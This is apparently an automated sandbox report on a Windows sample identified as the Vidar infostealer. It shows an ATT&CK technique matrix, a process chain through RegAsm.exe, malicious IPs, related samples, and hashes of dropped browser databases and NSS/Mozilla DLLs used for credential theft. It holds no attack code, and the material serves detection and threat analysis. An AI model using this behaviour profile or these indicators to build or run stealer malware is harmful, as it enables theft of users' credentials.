              Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
              Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 511 Process Injection | 2 Obfuscated Files or Information | 1 Credentials in Registry | 1 Account Discovery | Remote Desktop Protocol | 4 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
              Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 DLL Side-Loading | Security Account Manager | 4 File and Directory Discovery | SMB/Windows Admin Shares | 1 Screen Capture | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
              Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Masquerading | NTDS | 55 System Information Discovery | Distributed Component Object Model | Input Capture | 114 Application Layer Protocol | Traffic Duplication | Data Destruction
              Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Virtualization/Sandbox Evasion | LSA Secrets | 1 Network Share Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 511 Process Injection | Cached Domain Credentials | 141 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
              DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
              Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 12 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
              Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
              [Behavior graph (image not reproduced). Behavior Graph ID: 1445903; Sample: file.exe; Startdate: 22/05/2024; Architecture: WINDOWS; Score: 100. Process chain shown: file.exe started RegAsm.exe, which started cmd.exe, which started conhost.exe and timeout.exe.]

              Source | Detection | Scanner | Label | Link
              file.exe | 100% | Avira | HEUR/AGEN.1317026 |
              file.exe | 100% | Joe Sandbox ML | |

              Source | Detection | Scanner | Label | Link
              C:\ProgramData\DBFCBGCGIJKJ\freebl3.dll | 0% | ReversingLabs | |
              C:\ProgramData\DBFCBGCGIJKJ\mozglue.dll | 0% | ReversingLabs | |
              C:\ProgramData\DBFCBGCGIJKJ\msvcp140.dll | 0% | ReversingLabs | |
              C:\ProgramData\DBFCBGCGIJKJ\nss3.dll | 0% | ReversingLabs | |
              C:\ProgramData\DBFCBGCGIJKJ\softokn3.dll | 0% | ReversingLabs | |
              C:\ProgramData\DBFCBGCGIJKJ\vcruntime140.dll | 0% | ReversingLabs | |
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\sqls[1].dll | 0% | ReversingLabs | |
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\freebl3[1].dll | 0% | ReversingLabs | |
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\mozglue[1].dll | 0% | ReversingLabs | |
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\msvcp140[1].dll | 0% | ReversingLabs | |
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\nss3[1].dll | 0% | ReversingLabs | |
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\softokn3[1].dll | 0% | ReversingLabs | |
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dll | 0% | ReversingLabs | |
              No Antivirus matches
              No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
steamcommunity.com | 23.197.127.21 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
Name | Source | Malicious | Antivirus Detection | Reputation
IP | Domain | Country | ASN | ASN Name | Malicious
78.47.123.174 | unknown | Germany | 24940 | HETZNER-ASDE | false
23.197.127.21 | steamcommunity.com | United States | 20940 | AKAMAI-ASN1EU | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1445903
Start date and time: 2024-05-22 18:27:09 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 2s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@8/26@1/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 95
• Number of non-executed functions: 241
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes where analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: file.exe
Time | Type | Description
12:28:03 | API Interceptor | 1x Sleep call for process: RegAsm.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
78.47.123.174 | file.exe | | malicious | Vidar | |
78.47.123.174 | file.exe | | malicious | Vidar | |
78.47.123.174 | file.exe | | malicious | Vidar | |
78.47.123.174 | file.exe | | malicious | Vidar | |
78.47.123.174 | 5C8BGNPCno.exe | | malicious | CryptOne, Vidar | |
23.197.127.21 | file.exe | | malicious | Vidar | |
23.197.127.21 | file.exe | | malicious | Vidar | |
23.197.127.21 | https://store-steampowered-com.glitch.me/ | | malicious | Unknown | |
23.197.127.21 | Advanced_IP_Scanner_2.5.4594.1 (1).exe | | malicious | Unknown | |
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  steamcommunity.comfile.exeGet hashmaliciousVidarBrowse
                                  • 23.197.127.21
                                  file.exeGet hashmaliciousVidarBrowse
                                  • 92.122.104.90
                                  file.exeGet hashmaliciousVidarBrowse
                                  • 23.192.247.89
                                  file.exeGet hashmaliciousVidarBrowse
                                  • 23.67.133.187
                                  5C8BGNPCno.exeGet hashmaliciousCryptOne, VidarBrowse
                                  • 104.102.42.29
                                  file.exeGet hashmaliciousVidarBrowse
                                  • 104.102.42.29
                                  file.exeGet hashmaliciousVidarBrowse
                                  • 104.102.42.29
                                  3108_FreeDownloadFiles.zipGet hashmaliciousPureLog Stealer, VidarBrowse
                                  • 104.102.42.29
                                  file.exeGet hashmaliciousVidarBrowse
                                  • 104.102.42.29
                                  file.exeGet hashmaliciousVidarBrowse
                                  • 104.102.42.29
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  HETZNER-ASDEwhat dmv forms do i need to sell my car in ny 88970.jsGet hashmaliciousGookitLoaderBrowse
                                  • 136.243.58.194
                                  http://ct.ke/STUDENTS-FREE-LAPT0PSGet hashmaliciousUnknownBrowse
                                  • 148.251.133.229
                                  New Order.exeGet hashmaliciousUnknownBrowse
                                  • 88.99.137.18
                                  New Order.exeGet hashmaliciousUnknownBrowse
                                  • 88.99.137.18
                                  http://adsbymediavine.comGet hashmaliciousUnknownBrowse
                                  • 148.251.217.242
                                  file.exeGet hashmaliciousVidarBrowse
                                  • 78.47.123.174
                                  Zahlungsbest#U00e4tigung und Rechnung_pdf.batGet hashmaliciousFormBook, GuLoaderBrowse
                                  • 159.69.69.102
                                  bR9Ri9cFkm.elfGet hashmaliciousUnknownBrowse
                                  • 95.217.252.220
                                  Swift_USD103,700.exeGet hashmaliciousFormBookBrowse
                                  • 213.133.100.254
                                  Maersk-BL-Ref0929339041333 47367282378722.scrGet hashmaliciousAgentTeslaBrowse
                                  • 213.133.101.82
                                  AKAMAI-ASN1EUhttps://cs-server-s2s.yellowblue.io/sync-iframeGet hashmaliciousUnknownBrowse
                                  • 23.197.120.249
                                  http://adsbymediavine.comGet hashmaliciousUnknownBrowse
                                  • 104.97.15.51
                                  file.exeGet hashmaliciousVidarBrowse
                                  • 23.197.127.21
                                  MDE_File_Sample_6730f38a2cc3af5580532de53ea1d08e89e88e48.zipGet hashmaliciousUnknownBrowse
                                  • 23.43.61.160
                                  https://www.bing.com/ck/a?!&&p=8ea437cdae831bffJmltdHM9MTcxNTQ3MjAwMCZpZ3VpZD0wZTZlYTYzMC1mOTliLTY4ZWUtMmFlZS1iNWJmZjhiYzY5NDUmaW5zaWQ9NTIwNw&ptn=3&ver=2&hsh=3&fclid=0e6ea630-f99b-68ee-2aee-b5bff8bc6945&psq=yamamotokota.com&u=a1aHR0cHM6Ly95YW1hbW90b2tvdGEuY29tL0hPTUU#ZHVuY2FuLnJlYWRAam9obmxld2lzLmNvLnVrGet hashmaliciousUnknownBrowse
                                  • 104.126.37.177
                                  http://sallywilliamson.comGet hashmaliciousUnknownBrowse
                                  • 184.86.103.210
                                  https://innate-acidic-slip.glitch.me/public/zn0u.htm?/NATWESTB.ANKCR.CARD/info.htmGet hashmaliciousUnknownBrowse
                                  • 23.45.239.27
                                  ATTN EFT_Wire 63708 Transfer Receipt.docxGet hashmaliciousUnknownBrowse
                                  • 104.126.37.152
                                  file.exeGet hashmaliciousVidarBrowse
                                  • 23.67.133.187
                                  http://selliliar.liveGet hashmaliciousUnknownBrowse
                                  • 2.16.238.13
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  51c64c77e60f3980eea90869b68c58a8file.exeGet hashmaliciousVidarBrowse
                                  • 78.47.123.174
                                  file.exeGet hashmaliciousVidarBrowse
                                  • 78.47.123.174
                                  file.exeGet hashmaliciousVidarBrowse
                                  • 78.47.123.174
                                  file.exeGet hashmaliciousVidarBrowse
                                  • 78.47.123.174
                                  5C8BGNPCno.exeGet hashmaliciousCryptOne, VidarBrowse
                                  • 78.47.123.174
                                  7mDq6gvYVH.exeGet hashmaliciousCobaltStrikeBrowse
                                  • 78.47.123.174
                                  7mDq6gvYVH.exeGet hashmaliciousCobaltStrikeBrowse
                                  • 78.47.123.174
                                  perl530.dll.dllGet hashmaliciousCobaltStrikeBrowse
                                  • 78.47.123.174
                                  perl530.dll.dllGet hashmaliciousCobaltStrikeBrowse
                                  • 78.47.123.174
                                  37f463bf4616ecd445d4a1937da06e19UPazTgVGA7.dllGet hashmaliciousUnknownBrowse
                                  • 23.197.127.21
                                  UPazTgVGA7.dllGet hashmaliciousUnknownBrowse
                                  • 23.197.127.21
                                  FRA.0038253.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                  • 23.197.127.21
                                  Factura_pdf.exeGet hashmaliciousGuLoaderBrowse
                                  • 23.197.127.21
                                  file.exeGet hashmaliciousVidarBrowse
                                  • 23.197.127.21
                                  Zahlungsbest#U00e4tigung und Rechnung_pdf.batGet hashmaliciousFormBook, GuLoaderBrowse
                                  • 23.197.127.21
                                  waybillDoc_20052024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                  • 23.197.127.21
                                  101764ZAM2024.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                  • 23.197.127.21
                                  Twrchtrywth.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                  • 23.197.127.21
                                  SKIIP 83EC125T1 22-0-05-24RQ.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                  • 23.197.127.21
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  C:\ProgramData\DBFCBGCGIJKJ\mozglue.dllfile.exeGet hashmaliciousVidarBrowse
                                    file.exeGet hashmaliciousVidarBrowse
                                      file.exeGet hashmaliciousVidarBrowse
                                        5C8BGNPCno.exeGet hashmaliciousCryptOne, VidarBrowse
                                          66AF3M5zgO.exeGet hashmaliciousVidarBrowse
                                            sSX92EpKXA.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                              file.exeGet hashmaliciousVidarBrowse
                                                tTcrJ0HtoJ.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                  l2XteV3M4u.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                    7067B48pY6.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                      C:\ProgramData\DBFCBGCGIJKJ\freebl3.dllfile.exeGet hashmaliciousVidarBrowse
                                                        file.exeGet hashmaliciousVidarBrowse
                                                          file.exeGet hashmaliciousVidarBrowse
                                                            5C8BGNPCno.exeGet hashmaliciousCryptOne, VidarBrowse
                                                              66AF3M5zgO.exeGet hashmaliciousVidarBrowse
                                                                sSX92EpKXA.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                    tTcrJ0HtoJ.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                      l2XteV3M4u.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                        7067B48pY6.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                          Category:dropped
                                                                          Size (bytes):196608
                                                                          Entropy (8bit):1.1239949490932863
                                                                          Encrypted:false
                                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                          MD5:271D5F995996735B01672CF227C81C17
                                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:SQLite format 3
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                          Category:dropped
                                                                          Size (bytes):20480
                                                                          Entropy (8bit):0.6732424250451717
                                                                          Encrypted:false
                                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                          Malicious:false
                                                                          Reputation:high, very likely benign file
                                                                          Preview:SQLite format 3
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                          Category:dropped
                                                                          Size (bytes):98304
                                                                          Entropy (8bit):0.08235737944063153
                                                                          Encrypted:false
                                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                          Malicious:false
                                                                          Reputation:high, very likely benign file
                                                                          Preview:SQLite format 3
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):32768
                                                                          Entropy (8bit):0.017262956703125623
                                                                          Encrypted:false
                                                                          SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                          Malicious:false
                                                                          Reputation:high, very likely benign file
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                          Category:dropped
                                                                          Size (bytes):51200
                                                                          Entropy (8bit):0.8745947603342119
                                                                          Encrypted:false
                                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                          Malicious:false
                                                                          Preview:SQLite format 3
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:ASCII text, with very long lines (1717), with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):10237
                                                                          Entropy (8bit):5.498288591230544
                                                                          Encrypted:false
                                                                          SSDEEP:192:/nTFTRRFYbBp6SLZNMGaXU6qU4rzy+/3/OYiNBw8D7Sl:LreDFNMroyrdw60
                                                                          MD5:0F58C61DE9618A1B53735181E43EE166
                                                                          SHA1:CC45931CF12AF92935A84C2A015786CC810AEC3A
                                                                          SHA-256:AE9C3109DD23F391DC58C564080932100F55C8E674176D7911D54FB0D3417AE0
                                                                          SHA-512:DEA527C22D4AA607B00FBBCC1CDD9C6B69E92EC3B1B14649A086E87258AAD5C280BFB2835C165176E8759F575AA39D1B58E25CB40F60C7E88D94243A874B71BE
                                                                          Malicious:false
                                                                          Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                          Category:dropped
                                                                          Size (bytes):40960
                                                                          Entropy (8bit):0.8553638852307782
                                                                          Encrypted:false
                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                          Malicious:false
                                                                          Preview:SQLite format 3
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                          Category:dropped
                                                                          Size (bytes):106496
                                                                          Entropy (8bit):1.136471148832945
                                                                          Encrypted:false
                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                          Malicious:false
                                                                          Preview:SQLite format 3
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                          Category:dropped
                                                                          Size (bytes):5242880
                                                                          Entropy (8bit):0.0357803477377646
                                                                          Encrypted:false
                                                                          SSDEEP:192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
                                                                          MD5:76D181A334D47872CD2E37135CC83F95
                                                                          SHA1:B563370B023073CE6E0F63671AA4AF169ABBF4E1
                                                                          SHA-256:52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
                                                                          SHA-512:23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
                                                                          Malicious:false
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):32768
                                                                          Entropy (8bit):0.017262956703125623
                                                                          Encrypted:false
                                                                          SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                          Malicious:false
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                          Category:dropped
                                                                          Size (bytes):155648
                                                                          Entropy (8bit):0.5407252242845243
                                                                          Encrypted:false
                                                                          SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                          MD5:7B955D976803304F2C0505431A0CF1CF
                                                                          SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                          SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                          SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                          Malicious:false
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                          Category:dropped
                                                                          Size (bytes):159744
                                                                          Entropy (8bit):0.5394293526345721
                                                                          Encrypted:false
                                                                          SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                          MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                          SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                          SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                          SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                          Malicious:false
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):685392
                                                                          Entropy (8bit):6.872871740790978
                                                                          Encrypted:false
                                                                          SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                          MD5:550686C0EE48C386DFCB40199BD076AC
                                                                          SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                          SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                          SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Joe Sandbox View:
                                                                          • Filename: file.exe, Detection: malicious
                                                                          • Filename: file.exe, Detection: malicious
                                                                          • Filename: file.exe, Detection: malicious
                                                                          • Filename: 5C8BGNPCno.exe, Detection: malicious
                                                                          • Filename: 66AF3M5zgO.exe, Detection: malicious
                                                                          • Filename: sSX92EpKXA.exe, Detection: malicious
                                                                          • Filename: file.exe, Detection: malicious
                                                                          • Filename: tTcrJ0HtoJ.exe, Detection: malicious
                                                                          • Filename: l2XteV3M4u.exe, Detection: malicious
                                                                          • Filename: 7067B48pY6.exe, Detection: malicious
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):608080
                                                                          Entropy (8bit):6.833616094889818
                                                                          Encrypted:false
                                                                          SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                          MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                          SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                          SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                          SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Joe Sandbox View:
                                                                          • Filename: file.exe, Detection: malicious
                                                                          • Filename: file.exe, Detection: malicious
                                                                          • Filename: file.exe, Detection: malicious
